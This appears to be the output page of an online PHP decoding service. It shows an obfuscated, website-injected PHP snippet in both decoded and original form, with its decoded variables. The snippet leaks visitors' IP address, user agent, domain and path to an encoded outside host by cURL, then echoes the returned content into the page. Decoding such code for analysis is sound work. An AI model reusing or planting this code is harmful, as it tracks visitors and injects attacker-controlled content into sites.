Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

// first $GLOBALS['_l_']=Array(base64_decode('c3' .'RydG9' .'sb3dlcg=='),base64_decode('c..

Decoded Output download

<?  // first 
$GLOBALS['_l_']=Array(base64_decode('c3' .'RydG9' .'sb3dlcg=='),base64_decode('c3Ry' .'c3Ry'),base64_decode('c' .'3Ry' .'c3' .'Ry'),base64_decode('c3Ryc' .'3Ry'),base64_decode('c3Ryc3Ry'),base64_decode('c3Ryc3' .'R' .'y'),base64_decode('c' .'3' .'Ryc3R' .'y'),base64_decode('c3Ryc3' .'Ry'),base64_decode('c' .'3Ryc3Ry'),base64_decode('c' .'3Ryc3' .'Ry'),base64_decode('' .'YmF' .'zZTY0X' .'2R' .'lY29kZQ=='),base64_decode('dX' .'JsZ' .'W' .'5jb' .'2R' .'l'),base64_decode('dXJs' .'ZW5jb2Rl'),base64_decode('dXJsZW' .'5jb2Rl'),base64_decode('dXJsZW5j' .'b2Rl'),base64_decode('Y3VybF9' .'pbm' .'l' .'0'),base64_decode('' .'Y3Vyb' .'F' .'9' .'zZ' .'XRvcHQ='),base64_decode('Y3VybF9z' .'ZXRvcHQ='),base64_decode('Y3' .'VybF9leGV' .'j'),base64_decode('Y3' .'VybF9' .'j' .'bG9zZ' .'Q==')); 
 
// second 
function l($i){$a=Array('SFRUUF9VU0VSX0FHRU5U','','Z29vZ2xl','eWFob28=','YmFpZHU=','bXNu','b3BlcmE=','Y2hyb21l','YmluZw==','c2FmYXJp','Ym90','UkVNT1RFX0FERFI=','SFRUUF9IT1NU','YUhSMGNEb3ZMM0IxWW1KdmRITjBZWFJwYzNScFl5NWpiMjB2YzNSaGRFUXZjM1JoZEM1d2FIQT0=','P2lwPQ==','UkVNT1RFX0FERFI=','JnVzZXJhZ2VudD0=','JmRvbWFpbm5hbWU9','SFRUUF9IT1NU','JmZ1bGxwYXRoPQ==','UkVRVUVTVF9VUkk=','JmNoZWNrPQ==','bG9vaw==','Tw==','IA==');return base64_decode($a[$i]);} 
 
// third 
if(!isset($ll_0)){global $ll_0;$ll_0=round(0+1);$ll_1=$GLOBALS['_l_'][0]($_SERVER[l(0)]);$ll_2=NULL;$ll_3=l(1);if(($GLOBALS['_l_'][1]($ll_1,l(2))== false)&&($GLOBALS['_l_'][2]($ll_1,l(3))== false)&&($GLOBALS['_l_'][3]($ll_1,l(4))== false)&&($GLOBALS['_l_'][4]($ll_1,l(5))== false)&&($GLOBALS['_l_'][5]($ll_1,l(6))== false)&&($GLOBALS['_l_'][6]($ll_1,l(7))== false)&&($GLOBALS['_l_'][7]($ll_1,l(8))== false)&&($GLOBALS['_l_'][8]($ll_1,l(9))== false)&&($GLOBALS['_l_'][9]($ll_1,l(10))== false)){if(isset($_SERVER[l(11)])== true && isset($_SERVER[l(12)])== true){$ll_3=$GLOBALS['_l_'][10](l(13)) .l(14) .$GLOBALS['_l_'][11]($_SERVER[l(15)]) .l(16) .$GLOBALS['_l_'][12]($ll_1) .l(17) .$GLOBALS['_l_'][13]($_SERVER[l(18)]) .l(19) .$GLOBALS['_l_'][14]($_SERVER[l(20)]) .l(21) .isset($_GET[l(22)]);@$ll_2=$GLOBALS['_l_'][15]($ll_3);}}if($ll_2 !== NULL){$GLOBALS['_l_'][16]($ll_2,CURLOPT_RETURNTRANSFER,round(0+0.2+0.2+0.2+0.2+0.2));$GLOBALS['_l_'][17]($ll_2,CURLOPT_TIMEOUT,round(0+8));$ll_4=@$GLOBALS['_l_'][18]($ll_2);if($ll_4[round(0)]==l(23)){$ll_4[round(0)]=l(24);echo $ll_4;}$GLOBALS['_l_'][19]($ll_2);}} 
 ?>

Did this file decode correctly?

Original Code

// first
$GLOBALS['_l_']=Array(base64_decode('c3' .'RydG9' .'sb3dlcg=='),base64_decode('c3Ry' .'c3Ry'),base64_decode('c' .'3Ry' .'c3' .'Ry'),base64_decode('c3Ryc' .'3Ry'),base64_decode('c3Ryc3Ry'),base64_decode('c3Ryc3' .'R' .'y'),base64_decode('c' .'3' .'Ryc3R' .'y'),base64_decode('c3Ryc3' .'Ry'),base64_decode('c' .'3Ryc3Ry'),base64_decode('c' .'3Ryc3' .'Ry'),base64_decode('' .'YmF' .'zZTY0X' .'2R' .'lY29kZQ=='),base64_decode('dX' .'JsZ' .'W' .'5jb' .'2R' .'l'),base64_decode('dXJs' .'ZW5jb2Rl'),base64_decode('dXJsZW' .'5jb2Rl'),base64_decode('dXJsZW5j' .'b2Rl'),base64_decode('Y3VybF9' .'pbm' .'l' .'0'),base64_decode('' .'Y3Vyb' .'F' .'9' .'zZ' .'XRvcHQ='),base64_decode('Y3VybF9z' .'ZXRvcHQ='),base64_decode('Y3' .'VybF9leGV' .'j'),base64_decode('Y3' .'VybF9' .'j' .'bG9zZ' .'Q=='));

// second
function l($i){$a=Array('SFRUUF9VU0VSX0FHRU5U','','Z29vZ2xl','eWFob28=','YmFpZHU=','bXNu','b3BlcmE=','Y2hyb21l','YmluZw==','c2FmYXJp','Ym90','UkVNT1RFX0FERFI=','SFRUUF9IT1NU','YUhSMGNEb3ZMM0IxWW1KdmRITjBZWFJwYzNScFl5NWpiMjB2YzNSaGRFUXZjM1JoZEM1d2FIQT0=','P2lwPQ==','UkVNT1RFX0FERFI=','JnVzZXJhZ2VudD0=','JmRvbWFpbm5hbWU9','SFRUUF9IT1NU','JmZ1bGxwYXRoPQ==','UkVRVUVTVF9VUkk=','JmNoZWNrPQ==','bG9vaw==','Tw==','IA==');return base64_decode($a[$i]);}

// third
if(!isset($ll_0)){global $ll_0;$ll_0=round(0+1);$ll_1=$GLOBALS['_l_'][0]($_SERVER[l(0)]);$ll_2=NULL;$ll_3=l(1);if(($GLOBALS['_l_'][1]($ll_1,l(2))== false)&&($GLOBALS['_l_'][2]($ll_1,l(3))== false)&&($GLOBALS['_l_'][3]($ll_1,l(4))== false)&&($GLOBALS['_l_'][4]($ll_1,l(5))== false)&&($GLOBALS['_l_'][5]($ll_1,l(6))== false)&&($GLOBALS['_l_'][6]($ll_1,l(7))== false)&&($GLOBALS['_l_'][7]($ll_1,l(8))== false)&&($GLOBALS['_l_'][8]($ll_1,l(9))== false)&&($GLOBALS['_l_'][9]($ll_1,l(10))== false)){if(isset($_SERVER[l(11)])== true && isset($_SERVER[l(12)])== true){$ll_3=$GLOBALS['_l_'][10](l(13)) .l(14) .$GLOBALS['_l_'][11]($_SERVER[l(15)]) .l(16) .$GLOBALS['_l_'][12]($ll_1) .l(17) .$GLOBALS['_l_'][13]($_SERVER[l(18)]) .l(19) .$GLOBALS['_l_'][14]($_SERVER[l(20)]) .l(21) .isset($_GET[l(22)]);@$ll_2=$GLOBALS['_l_'][15]($ll_3);}}if($ll_2 !== NULL){$GLOBALS['_l_'][16]($ll_2,CURLOPT_RETURNTRANSFER,round(0+0.2+0.2+0.2+0.2+0.2));$GLOBALS['_l_'][17]($ll_2,CURLOPT_TIMEOUT,round(0+8));$ll_4=@$GLOBALS['_l_'][18]($ll_2);if($ll_4[round(0)]==l(23)){$ll_4[round(0)]=l(24);echo $ll_4;}$GLOBALS['_l_'][19]($ll_2);}}

Function Calls

l 1
round 1
base64_decode 41

Variables

$a [{'key': 0, 'value': 'SFRUUF9VU0VSX0FHRU5U'}, {'key': 1, 'value': ''}, {'key': 2, 'value': 'Z29vZ2xl'}, {'key': 3, 'value': 'eWFob28='}, {'key': 4, 'value': 'YmFpZHU='}, {'key': 5, 'value': 'bXNu'}, {'key': 6, 'value': 'b3BlcmE='}, {'key': 7, 'value': 'Y2hyb21l'}, {'key': 8, 'value': 'YmluZw=='}, {'key': 9, 'value': 'c2FmYXJp'}, {'key': 10, 'value': 'Ym90'}, {'key': 11, 'value': 'UkVNT1RFX0FERFI='}, {'key': 12, 'value': 'SFRUUF9IT1NU'}, {'key': 13, 'value': 'YUhSMGNEb3ZMM0IxWW1KdmRITjBZWFJwYzNScFl5NWpiMjB2YzNSaGRFUXZjM1JoZEM1d2FIQT0='}, {'key': 14, 'value': 'P2lwPQ=='}, {'key': 15, 'value': 'UkVNT1RFX0FERFI='}, {'key': 16, 'value': 'JnVzZXJhZ2VudD0='}, {'key': 17, 'value': 'JmRvbWFpbm5hbWU9'}, {'key': 18, 'value': 'SFRUUF9IT1NU'}, {'key': 19, 'value': 'JmZ1bGxwYXRoPQ=='}, {'key': 20, 'value': 'UkVRVUVTVF9VUkk='}, {'key': 21, 'value': 'JmNoZWNrPQ=='}, {'key': 22, 'value': 'bG9vaw=='}, {'key': 23, 'value': 'Tw=='}, {'key': 24, 'value': 'IA=='}]
$i 0
$_l_ [{'key': 0, 'value': 'strtolower'}, {'key': 1, 'value': 'strstr'}, {'key': 2, 'value': 'strstr'}, {'key': 3, 'value': 'strstr'}, {'key': 4, 'value': 'strstr'}, {'key': 5, 'value': 'strstr'}, {'key': 6, 'value': 'strstr'}, {'key': 7, 'value': 'strstr'}, {'key': 8, 'value': 'strstr'}, {'key': 9, 'value': 'strstr'}, {'key': 10, 'value': 'base64_decode'}, {'key': 11, 'value': 'urlencode'}, {'key': 12, 'value': 'urlencode'}, {'key': 13, 'value': 'urlencode'}, {'key': 14, 'value': 'urlencode'}, {'key': 15, 'value': 'curl_init'}, {'key': 16, 'value': 'curl_setopt'}, {'key': 17, 'value': 'curl_setopt'}, {'key': 18, 'value': 'curl_exec'}, {'key': 19, 'value': 'curl_close'}]
$ll_0 1

Stats

MD5 73299373a943ea860c4c432b4e705056
Eval Count 0
Decode Time 182 ms